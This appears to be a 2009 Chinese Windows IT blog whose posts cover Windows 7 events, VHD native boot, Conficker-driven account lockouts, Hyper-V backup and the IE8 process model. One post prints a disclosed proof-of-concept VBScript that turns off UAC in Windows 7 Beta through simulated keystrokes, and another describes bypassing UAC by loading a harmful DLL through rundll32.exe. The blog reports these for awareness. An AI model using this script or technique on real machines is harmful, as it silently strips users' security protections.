Asuka's Blog

好消息，Windows Internals 第5版已经上市了

Asuka Zhang — Wed, 01 Jul 2009 05:57:00 GMT

Windows内核圣经级别的图书《Windows Internals》的第五版已经上市了，我的好兄弟刘晖帮我从Amazon订了一本，最晚到9月底之前我就可以拿到这本书了。

关于这本书的第四版，我曾经写过一些blog讨论，有兴趣的朋友可以翻一下我的旧文章看看。

刚刚从channel 10看了一个这本书的2位作者Mark和David的采访，挺有意思的，爆了些料，也介绍了一下这本书的前几版的一些历史背景。David很搞笑的说，他作为非MS的员工，在Redmond教Windows Develop Team Windows Kernel的课程，这的确是很Strange的一件事。07年Windows Internals第四版刚出中文版的时候，我在上海的紫竹园微软研发中心看到过一次David Solomon，当然那个时候他也是在教Windows Kernel。

http://channel9.msdn.com/posts/Charles/Mark-Russinovich-and-David-Solomon-Windows-Internals-5-Released/

刚刚还找到一个Mark在今年Teched美国上的视频，一并放出地址

http://www.msteched.com/online/view.aspx?tid=2d88f481-16bd-4fe6-909f-8833c92a5b1a

09.6.3 Win 7在线聊天活动实况录像

Asuka Zhang — Thu, 04 Jun 2009 03:16:00 GMT

http://v.youku.com/v_show/id_XOTYwOTk5ODg=.html

好像这里插入在线视频有些问题

起初我的线路可能有些问题，后来刘晖的线路又出了问题，幸好来的人多，人多力量大。

第一次参加这种形式的活动，我发现我的语速真的很快，以后要降速，在录制Howto的视频时也总是说得很快。

[大话IT] 本周三MCSE技术论坛在线活动7--Windows 7这点事

Asuka Zhang — Mon, 01 Jun 2009 01:31:00 GMT

Win 7这些事

Asuka:如果您对有微软技术感兴趣，如果您对于Windows 7感兴趣，如果您因故错过了小弟4.25日在微软的讲座，没关系，只要您有网线跟电脑，这周三，Asuka邀请了2位好兄弟刘晖跟张杰一起，与您在线分享Windows 7的使用心得体会。

讲座介绍：

想必大家一定对凤凰台的《锵锵三人行》不陌生，一起针对每日热门新闻事件进行研究，并各抒己见，但却又不属于追求问题答案的「正论」，而是「俗人闲话」，一派「多少天下事，尽付笑谈中」的豪情，达至融汇信息传播，制造乐趣与辨析事理三大元素于一身的目的。

作为IT工作人员的诸位一定对于传统的在线技术讲座有些“排斥感”了吧，是的，技术永远是枯燥的，永远是冷冰冰的。但是如果能够把表达形式转换一下，一定会有一个更好的体验效果。

因此本次的MCSE在线活动变化一下形式，将首次采用谈话类节目的方式，邀请到了3位微软MVP作为谈话嘉宾，分别是刘晖、张杰和张诚，3位MVP会就一些Win 7的技术热点和相关的背景进行在线讨论。

也欢迎给位听众积极参与互动，把想给几位专家提问的问题在这里跟帖，如果您的问题被选中，就有机会中奖，可谓即收获了知识有收获了奖品。

奖品介绍

Win 7 RC中文版光盘

3位专家介绍：

刘晖，六届微软最有价值专家(MVP)，精通Windows客户端技术，活跃于微软技术论坛。目前已在计算机类杂志上发表了200多篇原创文章，出版7本原创或翻译的Windows技术图书，包括《Windows Vista实用宝典》，《Windows Vista使用详解》和《Windows安全指南》等。

博客地址：www.xieyidian.com

张杰，网名Alexis Zhang，三届微软最有价值专家(MVP)。IT技术深资工程师。精通Windows Shell/User系统技术领域。现任微软中国技术社区Windows系统组站长、微软itecn.net技术博客特约作者；在微软中国技术社区、微软中文新闻组及itecn.net博客网站发表技术文章千余篇。

博客地址：blogs.itecn.net/blogs/alexis

张诚，网名Asuka，微软最有价值专家（MVP）。微软中文社区XP版面版主，ITECN核心作者。熟悉微软Windows操作系统，具有丰富的网络管理经验，发表过多篇微软技术文章，并参与翻译《Windows Powershell脚本编程》中文版一书。

博客地址：blogs.itecn.net/blogs/asuka

【活动时间】
2009年6月3日周三晚上20点00分
【活动地点】
https://www.livemeeting.com/cc/usergroups/join?id=3CCMSQ&role=attend
会议开始前30分钟可以登入。

虚拟化测试小工具SecurAble的问题

Asuka Zhang — Wed, 20 May 2009 02:10:00 GMT

这些天在网上发现了一个很好的小工具，叫SecurAble，就是专门用来测试微软虚拟化平台的一些硬件符合指标，包括Hyper-V以及在Win 7 RC版本里面的XP Mode。

但是我发现这个小工具在真实测试的过程中是有问题的，看我下面的截图

很显然，这是我的一台服务器，已经把Hyper-V都安装好了，但是小工具却提示硬件虚拟化不支持，Oh Dear~~~

所以说，真的要看一台机器是否满足虚拟化的条件，还是老老实实的去看硬件的说明文档吧:)

加入ITECN两周年啦

Asuka Zhang — Mon, 18 May 2009 05:36:00 GMT

前不久，张杰老兄庆祝了他在ITECN上的第100篇博文，真羡慕啊。

转眼，我都在这里2年了。

2年时间很快，成就不高，所以不多说了，低调些比较好。

在这里先记一笔，以后可以慢慢补，哈哈。

关于Steve Riley先生的回忆

Asuka Zhang — Fri, 08 May 2009 06:24:00 GMT

昨天看新闻着实吓了一大跳，著名的微软安全专家Steve Riley竟然在这次的裁员风暴中不幸被解雇，真的很震撼，有点不相信自己的眼睛，直到后来看了他自己的blog才终于相信的了。

Steve Riley是著名的安全专家，每次Teched他总是Keynote Speaker之一，我有幸在2007年2次见到过Riley先生，并很荣幸的跟他合过影。我不清楚微软的裁员标准是什么，但是少了这么一位擅于演讲、技术能力超强和超有个性的专家无疑是微软的一大损失。国外的很多技术同行也深表惋惜，看看这里的留言就知道了，而著名的MVP Susan Bradley更是写了一封《告Steve Ballmer》来表达不满。

我最近一次看到他是3月份的MVP Summit，当时我在Building 22等Nuo Yan,突然偶遇了Steve Riley，还打了个招呼，他看起来还是那么得有活力，没想到2个月之后他竟然要告别Redmond。

说一些Steve Riley在技术上面的贡献：

书

我之前就推荐过《Protect Your Windows Network: From Perimeter to Data》尽管中文版，但是翻译得着实懒，不推荐。原版书很经典，而此书的另一个作者Jesper M. Johansson 其实在3年前就离开了微软，不过他不是被裁的，而且他现在依旧经常在Technet Magzine上面发表文章。

演讲

他的演讲最著名，很有个性的，我在微软的一个站点找到了他很多的研究视频
点击这里访问

文章

他的blog上面有很多经典文章，比如《Configure your router to block DOS attempts》、《Security myths and passwords》都是很值得推荐的文章

最后祝愿他在以后的工作中顺利，毕竟此处不留人，自有留人处。

4月25日，Asuka在微软有个讲座，兄弟们来捧场啊！

Asuka Zhang — Sat, 18 Apr 2009 03:32:00 GMT

下周六，微软在上海徐家汇美罗的办公室，Topic是关于Windows 7的一个Overview，不过我会Focus在一些有意思的东西，比如VHD、DirectAccess、IE 8等上面，如果有兴趣的话，届时可以来听一下，活动全程免费。

更多详情和报名方法，请看下面这个链接

http://www.itprocity.com/event/edm/edm20090425_sh.htm

Asuka期待见到各位！

使用Win 7引导程序启动VHD的N个场景

Asuka Zhang — Mon, 06 Apr 2009 05:57:57 GMT

首先，我想指正一个说法，网上经常说Win 7 Native Boot VHD，更确切的说，应该是The Boot Loader Of Win 7 Native Boot VHD，重点突出---Win 7(包括2k8 R2)的Boot Loader。

下面是2种大的场景分类

我来一一解释每一种场景。

1.双系统

介绍双系统场景的文章比较多，操作起来也比较方便，远的不说，先看盆盆的这篇文章《[虚拟化实战]无需借助虚机安装,就能从VHD原生启动》，真的是一步到位。

双系统顾名思义，就是在原有的一个系统上添加一个新的系统，这里我假设在在原有的Win 7上添加一个新的Win 2k8 R2。我可以比喻成1+VHD，1就是原有的操作系统（Win 7），VHD则是要新增的操作系统。

-------------------------------------------------------------------------------------------------------------------

实验条件：

1.一台安装Win 7的计算机

2.ImageX

3.一张Wn 2k8 R2安装光盘（其实只需要里面的Install.wim文件）

-------------------------------------------------------------------------------------------------------------------

这里我还是简单的说一下步骤：

1.在已有的Win 7里面新建一个VHD并挂载到X盘（可以随意选盘符）

2.ImageX一个Win 2k8 R2到X盘

3.修改启动项，Bcdedit

如果对于需要更详细的步骤，可以参考Frank的这篇文章从《VHD文件启动计算机》。

-------------------------------------------------------------------------------------------------------------------

注意事项：

1.只能ImageX一个Win 7以上的操作系统，如果ImageX一个Vista，再实现双系统，当用Win 7的引导程序引导这个VHD会提示错误

2.这个时候引导双系统的引导程序，是原来Win 7的。原有的操作系统可以是Vista或者2008的吗？

本来我认为是不可以的，不过看了Frank的《再谈从虚拟磁盘文件启动计算机》，发现还是可以做的到的

2.单系统

所谓单系统，就是单一的VHD，一个硬盘上面放一个VHD，我把它比喻成0+VHD，0就是一个空硬盘，上面什么都没有，VHD则是要新增的操作系统。这个才是我今天要介绍的重点。同样，我这里VHD上的操作系统是Win 2k8 R2为例。

单一VHD有2种部署方法：WinPE 3.0和双硬盘。

2.1 WinPE 3.0

我也先推荐一篇文章，是MVP苏繁的《Step by Step VHD with Native Boot》

-------------------------------------------------------------------------------------------------------------------

实验环境：

1.一台没有操作系统的新计算机

2.WinPE 3.0光盘（里面最好附带ImageX）

3.一张Wn 2k8 R2安装光盘（其实只需要里面的Install.wim文件）

4.一台普通的计算机，只作存放2k8 R2光盘使用，并把光盘共享出来

5.新计算机和普通的计算机都需要在同一网段

6.Bcdboot

-------------------------------------------------------------------------------------------------------------------

简单说一下步骤：

1.先在新计算机的光驱放入WinPE 3.0的光盘，并引导

2.在WinPE 3.0的环境里面把新计算机的硬盘分区，分成一个C盘外加一个S盘，C盘用来存放VHD，S盘用来存放引导程序，并把S盘设置成为Active

3.新建一个VHD放在C盘上，并挂载到X盘符

4.在普通的计算机上放入2k8 R2的光盘，并共享盘符

5.回到WinPE 3.0的界面里面，用ImageX把2k8 R2的镜像还原到X盘

6.Bcdboot，把引导程序写入S盘

其中的步骤就这些，苏繁的文章写得很详细。

-------------------------------------------------------------------------------------------------------------------

注意事项：

1.如果没有网络环境，可以考虑使用2个光驱或者U盘，有很多种组合的方式，宗旨就是：从WinPE 3.0启动系统，然后在里面把2k8 R2的镜像还原到VHD的挂载盘符，最后Bcdboot制作引导程序

当然也可以先做好VHD，然后拷到新硬盘去就好了。

从上面的步骤，我们可以发现有2个明显的缺点：1.命令行下面操作 2.需要网络环境

所以，我还是重点推荐一下双硬盘的方法。

2.2 双硬盘

-------------------------------------------------------------------------------------------------------------------

实验环境：

1.一台Win 7计算机，挂载双硬盘，一块硬盘是Win 7用的，而另外一块硬盘是空的，就是我们要放VHD的实验硬盘

2.一张Wn 2k8 R2安装光盘（其实只需要里面的Install.wim文件）

3.ImageX

4.Bcdboot

-------------------------------------------------------------------------------------------------------------------

简单说一下步骤：

1.先在Win 7里面把空的硬盘分区，分成两个盘符，其中一个放VHD文件，另外一个放引导程序，假设是E盘和S盘，S盘需要设置为Active

2.在E盘里面新建一个VHD文件并挂载到X盘

3.ImageX 2k8 R2到X盘

4.Bcdboot，把引导程序写入S盘

相对上面的WinPE 3.0的方法，双硬盘显得容易操作一些，对于环境的要求也要小很多。

如果想要快速部署，可以先做好一个现成的2k8 R2的VHD，那么所需要做的就是复制粘贴再加Bcdboot。

最后补充一点：

ImageX还原出来的VHD文件，如果不进行Bcdboot，即使直接放到Hyper-V或者VPC里面，也无法引导。这点我起初也不明白，后来发现Hyper-V生成的VHD，和ImageX生成的VHD有本质的区别，在于前者直接生成了200M的包含bootmgr的System Partition，而后者没有，所以需要Bcdboot。

从conficker看AD帐号锁定

Asuka Zhang — Thu, 02 Apr 2009 03:02:51 GMT

2个礼拜前的今天，我在外面上HOL，结果我的同事打电话跟我说单位的很多用户反映，他们的帐号都被锁了，本来AD里面锁帐号的是3次错误输入就锁，一般偶尔有用户反映帐号被锁，但是大规模被锁，我觉得肯定有问题了。

回来后，看了一下Log,675的很多，就是说在猜测密码，我怀疑有黑客攻击，然后把主要报错的网段的光纤给拔掉，于是乎675的日志全部没有，而且帐号自动解锁，这很有可能就是蠕虫了。

上网搜了一下，果然有类似蠕虫----Downadup，这个蠕虫有个更好听的名字叫---Conficker

微软昨天也发布了关于这个蠕虫的专题页面

http://www.microsoft.com/protect/computer/viruses/worms/conficker.mspx

知道了原因，接下来要做的很简单，交给各个部门的网管员：

1.打上最新的补丁，不准漏网

2.用Symantec的专杀，昨天Symantec的工程师通知我Release了一个新的版本

http://www.symantec.com/security_response/writeup.jsp?docid=2009-011316-0247-99

3.把企业客户端的Symantec SAV都更新到最新版本，也不准有漏网，其实平时都是自动更新的，但是部分客户端还是有问题

4.把360安全卫士的U盘自动保护给打开

现在蠕虫基本得到控制。

然后，我想到了关于AD帐号锁定有一个白皮书，我一直搁着没看过，下载地址：

http://www.microsoft.com/downloads/details.aspx?FamilyID=8C8E0D90-A13B-4977-A4FC-3E2B67E3748E&displaylang=en

其中介绍了各种错误日志，并且在最后推荐了几个微软的小工具，用于AD帐号锁定排错

我自己总结了一下：

首先在组策略里面开启审核：Account Logon Events，如果需要DC上查看，就要编辑DC的策略

Log分析

675：密码不对

672：输入一个错误的用户名

644：锁帐号（注意Type是成功）

671：解锁帐号

2.工具

LockoutStatus.exe

快速查找AD里用户帐号状态

ALockout.dll Tool

分析哪个Process导致帐号被锁

ALoInfo.exe

查看一个计算机上的帐号状态

AcctInfo.dll

扩展标签，查看帐号状态

EventCombMT.exe

专门收集AD里面计算机的各种Log

找到个综合应用的文章：

诊断帐号被Lockout的原因

http://hi.baidu.com/hnwyh520/blog/item/83296788b6563292a4c272b8.html

最后又想到在这次解决问题的过程中，同事问我，如果AD管理员的密码忘记了怎么办，我说可以用一个工具恢复，这个工具是我的兄弟洛洛开发的一个基于WinPE的密码恢复工具

下载地址：http://www.mcse.org.cn/showtopic-9738.html

使用Windows 2008自带的备份工具备份和还原Hyper-V

Asuka Zhang — Mon, 16 Mar 2009 02:27:41 GMT

一直没有找到Hyper-V的备份教程，干脆自己写一篇

如果用第三方的备份工具，我建议可以考虑Symantec的BE 12.5，已经支持Hyper-V的备份

如果考虑用Windows自带的备份，那需要做一些注册表上的键值改动

首先看一下，在default情况下，如果备份好了，想还原虚拟机是做不到的，我们看到这边应用程序是灰色不可选的，要还原就只能整个卷一起上。

看了一篇KB:958662

其中提到了新建一个注册表项

最后推荐MVP Goxia的一篇文章，关于导入和导出Hyper-V配置的

http://goxia.maytide.net/read.php/1117.htm

再谈IE 8进程模型

Asuka Zhang — Fri, 13 Mar 2009 03:32:31 GMT

今天在网上看到了微软公布了一个IE8和其他2款浏览器：Firefox和Google Chrome的速度对比的白皮书和视频，感叹于IE8的高效和稳定。

然后结合之前Smallfrogs的《IE8 新特性分析：IE8的稳定性源自何处》和Alexis的《Windows Internet Explorer 8 在管理加载项与默认搜索引擎方面的改进》2篇文章来谈一下IE 8的进程模型。

首先我们看一下IE 7的进程模型

(图片引自于IE8 Team Blog)

在Vista的IE7当中（注：不能是XP），由2个进程掌管，一个是ieuser.exe，另外一个是iexplore.exe，其中ieuser.exe运行在medium的完整性级别，起着决定iexplorer.exe这个进程的完整性级别。

这里可以做个实验：在IE7里面打开2个空的Tab，然后分别在2个Tab上打开www.baidu.com和www.taobao.com，由于淘宝网需要运行在保护模式关闭的IE7进程下，因此此时会弹出一个新的IE页面来显示淘宝网的内容。

注意此时有2个IE的页面，从上面的图中就可以知道为什么了。因为在IE7当中，一个IE页面对应着一个iexplorer.exe的进程，而一个iexplorer.exe进程中的所有Tab都必须是相同的完整性级别。如果不同完整性级别的Tab出现，那么需要新开IE页面。

这个时候，用Process Explorer来分析一下2个进程：

再来看一下IE8的进程模型：

(图片引自于IE8 Team Blog)

在IE8里面的进程模型有了很大的变化，Smallfrogs的文章里面也介绍了很多，关键就在于IE8里面每个Tab都有一个iexplorer.exe的进程。

同样刚刚的实验放在IE8里面，就会发现，在一个IE8的页面里面可以同时运行百度和淘宝的Tab。

这是因为在IE8里面，取消了ieuser.exe这个进程，我猜测这也是IE8的运行速度加快很多的主要原因。其次就是一个Tab一个进程，使得在IE8下面的所有Tab都可以被装入一个IE页面，而不要再像IE7那样，同样完整性级别的Tab共享一个iexplorer.exe进程。这样，我们平时浏览不同完整性级别的网页的时候，就不需要切换IE的窗口，而只需要切换Tab就可以了。

这个时候，同样用Process Explorer来分析一下2个进程：

说了这么多，当然要说一下之所以IE8的进程模型要如此Design的原因，原因在smallfrogs的文章当中早有提出，这里引用一下：

“这种设计的好处就是一个Tab崩溃以后，只会影响这个Tab，对于其他的Tab是不影响的。同时，最外面的框架进程能够知道子Tab的情况，也就能够很好的实现“灾难恢复”了。”

32位的Win7真能够用上4G内存？

Asuka Zhang — Tue, 24 Feb 2009 08:48:35 GMT

这些天在很多网站论坛看多有人说32位的Win 7能够识别出4G的内存，有人跟帖说照片是PS过的，有人说不能用4G内存是微软的错，小弟我看得觉得挺有意思的，但是直觉告诉我这是不可能的事情。

于是乎，马上装了一台4G的32位Win 7玩玩，果然在系统属性里面是可以显示出4G的内存的。

但是之前拜读过一篇盆盆老大翻译的Mark的大作，信服于其中的理论，难道到了Win 7这些理论都被推翻了？

马上运行msinfo32.exe，果然一看，也是3.25G。

再用meminfo看一下物理地址的分配，显示出来的也是3.25G

果然，看来真理只有一个啊，再去设备管理器里面瞧瞧

CFF70000到FFFFFFFF这段内存都成了所谓的“内存空洞”而被设备所占用

所以，32位的Windows 7里面所谓的支持4G内存仅仅是体现在能够识别出4G，但是只能用3.25G。

PS.如果还有什么问题，您可以在下面帮我留言，因为下周我将会去西雅图参加今年的MVP Summit，而且有Mark Russinovich的Session，很棒吧！

Win7 Beta UAC“漏洞”第二弹

Asuka Zhang — Thu, 05 Feb 2009 06:31:05 GMT

前天发表了第一篇关于Win7 UAC的漏洞，当然那个实现比较简单，甚至有点“幼稚”。这不，第二弹马上出来了。国外的技术blog作者都在议论这个东西，我结合自己的理解和实验也来谈几点：

1.白名单

最早爆出新漏洞的仍旧是上次的2位作者withinwindows.com的Rafael Rivera和istartedsomething.com的Long Zheng。其中Rafael引用了这篇文章的分析，大致的意思就是说在Win7里面的UAC引入了一个“白名单”机制，下面是作者的原文：

Windows 7's UAC Whitelist:

The default UAC setting in Windows 7 is: "Don't notify me when I make changes to Windows settings."

What this really means is: "Don't notify me when Microsoft applications require administrator rights."

There is a hardcoded whitelist which allows only Microsoft's own applications (whether under interactive user control or not) to perform actions requiring admin rights (e.g. modifying C:\Program Files) without triggering UAC prompts. If the user chooses to do the same operation in a competitor's program then they will see a UAC prompt (assuming the program supports UAC at all and UAC has not been completely disabled).

The whitelisted, silent elevation is only for Microsoft's software and the user cannot add or remove items on the whitelist.

而事实上，这个白名单不光光是这么简单，作者在第二句话中强调了Microsoft applications，这里Asuka做一个很简单的实验，首先把win7中的记事本文件notepad.exe从system32目录下拷贝到桌面，然后双击打开，这个时候在打开的记事本中点击文件->打开->然后把路径定位到C:\Program Files目录，随便找一个文件比如Internet Explorer，尝试把它改一个名字，这个时候发现会弹出UAC的对话框

而如果用系统默认的记事本（位于System32路径下），做同样的操作，可以发现并没有弹出UAC的对话框。

这也就证明What this really means is: "Don't notify me when Microsoft applications require administrator rights."这个结论是不正确的。因为第一次用的记事本文件也是Microsoft applications，而结果也需要提权才能够进行操作。

至于正确的结论，现在微软还没有公布相应的文档，而上面提到的白名单也是存在的，但是估计还和路径有关，这也是Asuka个人的猜测，就像在Vista Beta的时候，盆盆也做了很多的猜测，后来很多还真准！

2.新漏洞

根据Rafael Rivera的新实验，新漏洞的产生原因大致是这样，由于Rundll32.exe位于白名单上，因此值得信任，在需要获得high level权限的时候不需要UAC对话框确认，就可以实现。

因此，可以把Rundll32.exe做一个代理，而后面把一段有害的代码编译成dll，用rundll32.exe去调用，就可以轻而易举的绕过UAC。

作者并因此写了个程序，在这里可以下载。

2009/2/9 更新 Rafael Rivera在其blog上面更新了一份白名单列表，由于并非微软官方提供，因此仅供参考

都是UAC控制中心惹得祸

Asuka Zhang — Tue, 03 Feb 2009 06:59:44 GMT

过年前，我曾经介绍过Win7 Beta中UAC的管理界面变得更加的人性和灵活，但是现在问题出来了。最近微软的一个技术blog作者Rafael Rivera用了一段vbs脚本就可以轻松的把Win7 Beta里面的UAC给关闭，脚本代码如下

'// 1337H4x Written by _____________ 
'//                    (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"

这段脚本代码很好理解，只需要保存为.vbs，并且在win 7中运行，那么UAC就可以被关闭。

看来有时候易用性和安全性之间的真的是一对永恒的矛盾。

而发现该漏洞的作者已经把这个漏洞像微软反馈，预知后事可以看作者的主页。

趣闻---Microsoft和Tattoo

Asuka Zhang — Sat, 31 Jan 2009 05:18:18 GMT

放假过年，咱不谈技术（预告一下：Win7的beta中UAC发现了一个大漏洞，可以用一段脚本来关闭，下个礼拜有时间来探讨一下），先谈一些有意思的东西。

刚刚看到一则报道说一个微软的员工曾经为了对公司表达衷心，在身上纹了一个很有意思的东西，并写了篇文章表达解释这个纹身的意思。

http://blogs.technet.com/danwoodman/archive/2008/07/21/i-love-this-company.aspx

但是人算不如天算，纵使再怎么表达衷心，终究还是抵不上这场经济危机，这哥们在这次微软裁员中成了牺牲品。

无独有偶，曾经看到过一个Zune的超级Fans，号称是世界上第一Zun粉的哥们，但最后由于种种原因转投了MAC的iPod阵营，可惜他身上的Zune的纹身要留一辈子了，除非他像Scofield一样把纹身给擦掉。

至于他为什么会转投阵营，可以看下面的报道：

http://www.iphonesavior.com/2008/07/zune-tattoo-guy.html

不过也不是所有做纹身表到对于微软和其产品喜爱的人都有不好的下场，著名的Windows程序专家charle petzold 也有一个纹身，而且是Windows的旧版logo。

而Petzold先生的巨作《Windows程序设计》还是很值得我们一读的，关于此圣经级别的Windows图书，可以参考这篇文章：http://blog.csdn.net/turingbooks/archive/2009/01/06/3720780.aspx